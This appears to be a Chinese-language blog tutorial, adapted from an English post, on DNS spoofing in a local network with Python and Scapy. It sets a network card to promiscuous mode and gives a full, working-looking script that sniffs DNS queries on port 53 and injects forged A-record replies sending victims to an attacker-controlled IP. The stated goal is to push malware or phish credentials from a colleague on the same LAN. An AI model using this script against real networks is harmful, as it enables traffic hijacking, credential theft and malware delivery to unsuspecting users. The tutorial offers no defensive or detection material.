通过python实现DNS欺骗
假设在一个的局域网内有两个人:Bob和Eve。Eve想让Bob访问他创建的恶意网页,这样她就可以通过隐藏性的下载给Bob的计算机上安装恶意软件,或者可能展示一个欺骗性的站点来试图窃取Bob的认证信息。
(图片来自以上提供的链接)
(本测试环境,均为centos6.5系统环境)
一、设置attacker服务器的网卡模式为混杂模式,这样就可以捕获局域网内的所有数据包:
ifconfig em1 promisc
查看网卡模式:ifconfig em1
说明网卡已经是混杂模式
二、编写攻击代码:
打开dns_spoof.py脚本文件:
1 #!/usr/bin/env python 2 # -*- coding -*-:utf-8 3 4 from scapy.all import * 5 import time 6 import logging 7 8 logger = logging.getLogger('main') 9 logging.basicConfig(format='%(levelname)s:%(message)s',level=logging.DEBUG) 10 logger.setLevel(logging.DEBUG) 11 # Set the interface for scapy to use 12 conf.iface = 'br0' 13 # Set the spoofed response 14 spoofed_ip = '192.168.28.118' 15 16 def send_response(x): 17 # Get the requested domain 18 req_domain = x[DNS].qd.qname 19 logger.info('Found request for' + req_domain) 20 # First,we delete the existing lengths and checksums.. 21 # We will let Scapy re-create them 22 del(x[UDP].len) 23 del(x[UDP].chksum) 24 del(x[IP].len) 25 del(x[IP].chksum) 26 # Let`s build our response from a copy of the original packet 27 response = x.copy() 28 # we need to start by changing our response to be "from-ds" ,or from the access point. 29 response.FCfield = 2L 30 # Switch the MAC addresses 31 #response.addr1,response.addr2 = x.addr2,x.addr1 32 response.src,response.dst = x.dst,x.src 33 # Switch the IP addresses 34 response[IP].src,response[IP].dst = x[IP].dst,x[IP].src 35 # Switch the ports 36 response.sport,response.dport = x.dport,x.sport 37 # Set the DNS flags 38 response[DNS].qr = 1L 39 response[DNS].ra = 1L 40 response[DNS].ancount = 1 41 # Let`s add on the answer section 42 response[DNS].an = DNSRR( 43 rrname = req_domain, 44 type = 'A', 45 rclass = 'IN', 46 ttl = 900, 47 rdata = spoofed_ip 48 ) 49 # Now,we inject the response! 50 sendp(response) 51 logger.info('Sent response:' + req_domain + ' -> ' + spoofed_ip + '\n') 52 53 def main(): 54 logger.info('Starting to intercept [CTRL+C to stop]') 55 sniff(prn=lambda x: send_response(x),lfilter=lambda x:x.haslayer(UDP) and x.dport == 53) 56 57 if __name__ == "__main__": 58 # Make it happen! 59 main()
该脚本将捕获局域网内的DNS的A记录查询
三、演示:(为了方便演示,将本地dns服务器设置为了223.5.5.5)
使用dig @223.5.5.5 www.baidu.com命令测试如下:
本文借鉴了http://jordan-wright.com/blog/2013/11/15/wireless-attacks-with-python-part-one-the-airpwn-attack/的方式,脚本直接使用会有问题,做了一下调整,局域网环境实验成功。
译文连接:http://www.oschina.net/translate/wireless-attacks-with-python-part-one-the-airpwn-attack